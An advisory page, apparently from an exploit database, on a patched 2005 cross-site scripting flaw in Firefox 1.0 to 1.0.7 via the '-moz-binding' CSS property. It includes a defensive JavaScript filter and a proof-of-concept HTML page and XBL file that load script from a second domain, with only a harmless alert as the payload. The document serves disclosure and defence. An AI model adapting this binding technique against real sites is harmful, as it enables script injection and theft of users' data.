Vendor: Firefox
By: SecurityFocus
CVSS: 7.5 (HIGH)
CWE: 79, Cross-site Scripting (XSS)
Product Name: Firefox
Affected Version From: Mozilla Firefox 1.0
Affected Version To: Mozilla Firefox 1.0.7
Patch Exists: YES
Related CWE: N/A
CPE: a:mozilla:firefox
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2005

Mozilla Firefox Security Vulnerability

Mozilla Firefox is prone to a security vulnerability that may let a Web page execute malicious script code in the context of an arbitrary domain. The issue affects the '-moz-binding' property. This could allow a malicious site to access the properties of a trusted site and facilitate various attacks including disclosure of sensitive information.

Mitigation:

Ensure that user-supplied input is properly validated and filtered before being used in the '-moz-binding' property.
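
One way to apply this filtering on the server side, as an added example that is not part of the original advisory: a fail-closed check that rejects user-supplied CSS naming the '-moz-binding' property, including when the name is written with CSS escapes or hidden behind comment markers. The function names and sample inputs are constructed for illustration.

```javascript
// Added example (not from the advisory): fail-closed check for user-supplied CSS.
// Function names and sample inputs are constructed for illustration.

// Decode CSS escapes so an obfuscated name such as "-moz-b\69nding" is normalised.
function decodeCssEscapes(css) {
  const escape = /\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?|\\([^\r\n\f0-9a-fA-F])/gu;
  return css.replace(escape, (match, hex, literal) => {
    if (literal !== undefined) return literal; // "\-" is a literal "-"
    const cp = parseInt(hex, 16);
    const invalid = cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
    return invalid ? "\ufffd" : String.fromCodePoint(cp);
  });
}

// Remove /* ... */ comments, including an unterminated one at the end.
function stripCssComments(css) {
  return css.replace(/\/\*[\s\S]*?(?:\*\/|$)/g, "");
}

// True when the CSS names -moz-binding in any spelling this check understands.
// Both the raw and the comment-stripped text are tested: a string such as
// "/*" can make a naive comment stripper swallow a real declaration, so the
// raw text is checked too, and anything ambiguous is treated as a match.
function containsMozBinding(css) {
  const needle = "-moz-binding";
  const views = [css, stripCssComments(css)];
  return views.some((v) => decodeCssEscapes(v).toLowerCase().includes(needle));
}

// Constructed samples; the first is the style rule from the page's domain1 example.
const samples = [
  'body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }',
  "body { -MOZ-b\\69nding: url(x) }",
  "body { color: red; background: url(bg.png) }",
];
for (const css of samples) {
  console.log(containsMozBinding(css) ? "reject" : "accept", "|", css);
}
```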

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16427/info

http://domain1/path/to/page.html :

<html>
  <head>
    <style>
      body { -moz-binding: url("http://domain2/path/to/xbl.xml#xss"); }
    </style>
  </head>
  <body>
  </body>
</html>

http://domain2/path/to/xbl.xml :

<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
          xmlns:html="http://www.w3.org/1999/xhtml">

  <binding id="xss">
    <implementation>
      <constructor>
        alert("XBL XSS");
      </constructor>
    </implementation>
  </binding>

</bindings>